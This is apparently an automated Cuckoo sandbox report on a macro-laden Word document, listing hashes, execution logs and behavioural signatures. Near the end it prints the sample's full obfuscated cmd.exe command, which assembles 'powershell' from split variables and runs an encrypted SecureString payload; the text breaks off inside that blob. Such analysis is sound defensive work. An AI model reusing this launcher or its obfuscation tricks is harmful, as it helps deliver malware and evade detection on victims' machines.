Summary

VirusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc

File VirusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc

Summary
Download Resubmit sample

Size 187.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: NNNKdGvL, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 14 19:02:00 2018, Last Saved Time/Date: Wed Mar 14 19:02:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5 fcc2686c5d100f2ae1bd6c8b6cfd50cc
SHA1 c73fcf3186aea563ba4ffeaa7617d70c9d4ed1a5
SHA256 6cc5ce59a494031e230cbec2cc4a774fcd52283ccb37a73dbea8e46e0bb94566
SHA512
bc348d55915da55c3d3cf062ec419072b13a2095c05e31f5fe3bfd22d0c51fb726ac7606f14a81aa13b7a6a7b4988072693e1db1a76c17ff6991a5dc92e2c65a
CRC32 649D9819
ssdeep None
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code

Score

This file is very suspicious, with a score of 10 out of 10!

Please notice: The scoring system is currently still in development and should be considered an alpha feature.

Feedback

Expecting different results? Send us this analysis and we will inspect it. Click here

Information on Execution

Analysis
Category Started Completed Duration Routing Logs
FILE Feb. 21, 2025, 2:50 a.m. Feb. 21, 2025, 2:58 a.m. 441 seconds internet Show Analyzer Log
Show Cuckoo Log

Analyzer Log

2025-02-21 00:42:30,015 [analyzer] DEBUG: Starting analyzer from: C:\tmpt1gcja
2025-02-21 00:42:30,015 [analyzer] DEBUG: Pipe server name: \??\PIPE\qcEvHmATFxBnCnnvyAgIDAxCsW
2025-02-21 00:42:30,030 [analyzer] DEBUG: Log pipe server name: \??\PIPE\JnTMcrFqUEEPjbvKxSTcaUdLbA
2025-02-21 00:42:30,437 [analyzer] DEBUG: Started auxiliary module Curtain
2025-02-21 00:42:30,437 [analyzer] DEBUG: Started auxiliary module DbgView
2025-02-21 00:42:31,108 [analyzer] DEBUG: Started auxiliary module Disguise
2025-02-21 00:42:31,312 [analyzer] DEBUG: Loaded monitor into process with pid 508
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module Human
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module Reboot
2025-02-21 00:42:31,390 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-02-21 00:42:31,530 [lib.api.process] INFO: Successfully executed process from path 'C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE' with arguments [u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\VirusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc'] and pid 600
2025-02-21 00:42:31,671 [analyzer] DEBUG: Loaded monitor into process with pid 600
2025-02-21 00:42:35,671 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Roaming\Microsoft\Office\MSO1033.acl
2025-02-21 00:42:38,140 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
2025-02-21 00:42:43,405 [analyzer] INFO: Injected into process with pid 1084 and name u'cmd.exe'
2025-02-21 00:42:43,546 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
2025-02-21 00:42:43,703 [analyzer] DEBUG: Loaded monitor into process with pid 1084
2025-02-21 00:42:43,905 [analyzer] INFO: Injected into process with pid 1824 and name u'powershell.exe'
2025-02-21 00:42:44,155 [analyzer] DEBUG: Loaded monitor into process with pid 1824
2025-02-21 01:55:04,835 [analyzer] INFO: Analysis timeout hit, terminating analysis.
2025-02-21 01:55:05,101 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 600.
2025-02-21 01:55:05,163 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 1084.
2025-02-21 01:55:05,210 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 1824.
2025-02-21 01:55:05,523 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 600.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 1084.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 1824.
2025-02-21 01:55:05,631 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-02-21 02:50:46,973 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:48,201 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:49,228 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:50,263 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:51,295 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:52,319 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:53,348 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:54,369 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:55,398 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:56,444 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:57,471 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:58,508 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:59,760 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:00,807 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:01,980 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:03,003 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:04,028 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:05,060 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:06,119 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:07,257 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:08,402 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:10,471 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:11,494 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:12,522 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:13,550 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:14,576 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:15,612 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:16,668 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:17,712 [cuckoo.core.scheduler] INFO: Task #6009950: acquired machine win7x642 (label=win7x642)
2025-02-21 02:51:17,716 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.202 for task #6009950
2025-02-21 02:51:18,188 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 3093839 (interface=vboxnet0, host=192.168.168.202)
2025-02-21 02:51:18,232 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x642
2025-02-21 02:51:18,945 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x642 to vmcloak
2025-02-21 02:54:26,255 [cuckoo.core.guest] INFO: Starting analysis #6009950 on guest (id=win7x642, ip=192.168.168.202)
2025-02-21 02:54:27,315 [cuckoo.core.guest] DEBUG: win7x642: not ready yet
2025-02-21 02:54:32,351 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x642, ip=192.168.168.202)
2025-02-21 02:54:32,685 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x642, ip=192.168.168.202, monitor=latest, size=6660546)
2025-02-21 02:54:34,222 [cuckoo.core.resultserver] DEBUG: Task #6009950: live log analysis.log initialized.
2025-02-21 02:54:35,510 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:36,128 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:36,878 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0001.jpg'
2025-02-21 02:54:37,073 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 133603
2025-02-21 02:54:39,192 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0002.jpg'
2025-02-21 02:54:39,208 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 121213
2025-02-21 02:54:40,334 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0003.jpg'
2025-02-21 02:54:40,356 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123848
2025-02-21 02:54:41,470 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0004.jpg'
2025-02-21 02:54:41,486 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123968
2025-02-21 02:54:42,591 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0005.jpg'
2025-02-21 02:54:42,607 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124037
2025-02-21 02:54:43,721 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0006.jpg'
2025-02-21 02:54:43,741 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123941
2025-02-21 02:54:44,835 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0007.jpg'
2025-02-21 02:54:44,858 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124083
2025-02-21 02:54:46,110 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0008.jpg'
2025-02-21 02:54:46,167 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124157
2025-02-21 02:54:47,786 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:48,287 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:48,288 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0009.jpg'
2025-02-21 02:54:48,305 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124038
2025-02-21 02:54:49,198 [cuckoo.core.guest] DEBUG: win7x642: analysis #6009950 still processing
2025-02-21 02:54:49,397 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0010.jpg'
2025-02-21 02:54:49,403 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 56286
2025-02-21 02:54:52,611 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0011.jpg'
2025-02-21 02:54:52,647 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 67339
2025-02-21 02:54:59,898 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0012.jpg'
2025-02-21 02:54:59,908 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 66713
2025-02-21 02:55:04,332 [cuckoo.core.guest] DEBUG: win7x642: analysis #6009950 still processing
2025-02-21 02:55:05,337 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'curtain/1740099305.34.curtain.log'
2025-02-21 02:55:05,341 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 36
2025-02-21 02:55:05,511 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'sysmon/1740099305.51.sysmon.xml'
2025-02-21 02:55:05,528 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 1441798
2025-02-21 02:55:05,537 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/7aea3ff1bfd57255_~$russhare_fcc2686c5d100f2ae1bd6c8b6cfd50cc'
2025-02-21 02:55:05,540 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 162
2025-02-21 02:55:05,550 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/f76d3f5e949be2bf_mso1033.acl'
2025-02-21 02:55:05,553 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 37762
2025-02-21 02:55:05,596 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/5e9b4e081abe7439_built-in building blocks.dotx'
2025-02-21 02:55:05,626 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 4187307
2025-02-21 02:55:06,169 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0013.jpg'
2025-02-21 02:55:06,185 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 139348
2025-02-21 02:55:06,201 [cuckoo.core.resultserver] DEBUG: Task #6009950 had connection reset for <Context for LOG>
2025-02-21 02:55:07,355 [cuckoo.core.guest] INFO: win7x642: analysis completed successfully
2025-02-21 02:55:07,380 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-02-21 02:55:07,401 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-02-21 02:55:08,518 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x642 to path /srv/cuckoo/cwd/storage/analyses/6009950/memory.dmp
2025-02-21 02:55:08,519 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x642
2025-02-21 02:58:07,808 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.202 for task #6009950
2025-02-21 02:58:08,221 [cuckoo.core.scheduler] DEBUG: Released database task #6009950
2025-02-21 02:58:08,254 [cuckoo.core.scheduler] INFO: Task #6009950: analysis procedure completed

Signatures

Yara rule detected for file (1 event)
description Detect a MS Office document with embedded VBA macro code rule Contains_VBA_macro_code
Allocates read-write-execute memory (usually to unpack itself) (8 events)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000005d51000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006ff4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006ff3000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000070d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000070d2000
process_handle: 0xffffffffffffffff
1 0 0
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
One or more processes crashed (1 event)
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d @ 0x7fefd979e5d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefe9073c3
NdrClientCall2+0x6b3 NdrClearOutParameters-0xf3d rpcrt4+0xe1493 @ 0x7fefe9d1493
NdrClientCall2+0x1d NdrClearOutParameters-0x15d3 rpcrt4+0xe0dfd @ 0x7fefe9d0dfd
SLGetEncryptedPIDEx+0xac57 SLCallServer-0x63d osppc+0x1a0af @ 0x74eba0af
SLpVLActivateProduct+0xe9 SLpGetMSPidInformation-0xcb osppc+0xc7cd @ 0x74eac7cd
SLActivateProduct+0x3df SLGetServerStatus-0xca1 osppcext+0x3a48f @ 0x74a3a48f
??0OdfStgParams@@QEAA@XZ+0xe6804 mso+0x1013a38 @ 0x7feee123a38
MsoCompareStringA+0x145a5a MsoGetTextExtentExPointW-0x1ed15a mso+0x59c84e @ 0x7feed6ac84e
MsoFreeCvsList+0x18ee2 MsoFreeFlinfo-0x3fc8a mso+0x1d4e1e @ 0x7feed2e4e1e
MsoFreeCvsList+0x19202 MsoFreeFlinfo-0x3f96a mso+0x1d513e @ 0x7feed2e513e
MsoFreeCvsList+0x18d23 MsoFreeFlinfo-0x3fe49 mso+0x1d4c5f @ 0x7feed2e4c5f
MsoFreeCvsList+0x18c9c MsoFreeFlinfo-0x3fed0 mso+0x1d4bd8 @ 0x7feed2e4bd8
MsoFGetButtonSize+0x7e280 MsoPwlfFromFlinfo-0x10af0 mso+0x12511c @ 0x7feed23511c
MsoFGetButtonSize+0x7df94 MsoPwlfFromFlinfo-0x10ddc mso+0x124e30 @ 0x7feed234e30
MsoFGetButtonSize+0x7de30 MsoPwlfFromFlinfo-0x10f40 mso+0x124ccc @ 0x7feed234ccc
MsoFGetButtonSize+0x7d934 MsoPwlfFromFlinfo-0x1143c mso+0x1247d0 @ 0x7feed2347d0
MsoUninitOffice+0x99d MsoFHideTaiwan-0xf57 mso+0x21c11 @ 0x7feed131c11
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7765652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c541 @ 0x7788c541

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 90 90 90 90 90 90 90 90
exception.symbol: RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 40541
exception.address: 0x7fefd979e5d
registers.r14: 0
registers.r15: 0
registers.rcx: 161147632
registers.rsi: 0
registers.r10: 148496688
registers.rbx: 0
registers.rsp: 161152848
registers.r11: 27
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 2114775703
registers.r13: 0
1 0 0
An application raised an exception which may be indicative of an exploit crash (2 events)
Application Crash Process WINWORD.EXE with pid 600 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d @ 0x7fefd979e5d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefe9073c3
NdrClientCall2+0x6b3 NdrClearOutParameters-0xf3d rpcrt4+0xe1493 @ 0x7fefe9d1493
NdrClientCall2+0x1d NdrClearOutParameters-0x15d3 rpcrt4+0xe0dfd @ 0x7fefe9d0dfd
SLGetEncryptedPIDEx+0xac57 SLCallServer-0x63d osppc+0x1a0af @ 0x74eba0af
SLpVLActivateProduct+0xe9 SLpGetMSPidInformation-0xcb osppc+0xc7cd @ 0x74eac7cd
SLActivateProduct+0x3df SLGetServerStatus-0xca1 osppcext+0x3a48f @ 0x74a3a48f
??0OdfStgParams@@QEAA@XZ+0xe6804 mso+0x1013a38 @ 0x7feee123a38
MsoCompareStringA+0x145a5a MsoGetTextExtentExPointW-0x1ed15a mso+0x59c84e @ 0x7feed6ac84e
MsoFreeCvsList+0x18ee2 MsoFreeFlinfo-0x3fc8a mso+0x1d4e1e @ 0x7feed2e4e1e
MsoFreeCvsList+0x19202 MsoFreeFlinfo-0x3f96a mso+0x1d513e @ 0x7feed2e513e
MsoFreeCvsList+0x18d23 MsoFreeFlinfo-0x3fe49 mso+0x1d4c5f @ 0x7feed2e4c5f
MsoFreeCvsList+0x18c9c MsoFreeFlinfo-0x3fed0 mso+0x1d4bd8 @ 0x7feed2e4bd8
MsoFGetButtonSize+0x7e280 MsoPwlfFromFlinfo-0x10af0 mso+0x12511c @ 0x7feed23511c
MsoFGetButtonSize+0x7df94 MsoPwlfFromFlinfo-0x10ddc mso+0x124e30 @ 0x7feed234e30
MsoFGetButtonSize+0x7de30 MsoPwlfFromFlinfo-0x10f40 mso+0x124ccc @ 0x7feed234ccc
MsoFGetButtonSize+0x7d934 MsoPwlfFromFlinfo-0x1143c mso+0x1247d0 @ 0x7feed2347d0
MsoUninitOffice+0x99d MsoFHideTaiwan-0xf57 mso+0x21c11 @ 0x7feed131c11
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7765652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c541 @ 0x7788c541

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 90 90 90 90 90 90 90 90
exception.symbol: RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 40541
exception.address: 0x7fefd979e5d
registers.r14: 0
registers.r15: 0
registers.rcx: 161147632
registers.rsi: 0
registers.r10: 148496688
registers.rbx: 0
registers.rsp: 161152848
registers.r11: 27
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 2114775703
registers.r13: 0
1 0 0
Creates hidden or system file (1 event)
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000000000003cc
filepath: C:\Users\Administrator\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
Creates a suspicious process (2 events)
cmdline "C:\Windows\System32\cmd.exe" apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEA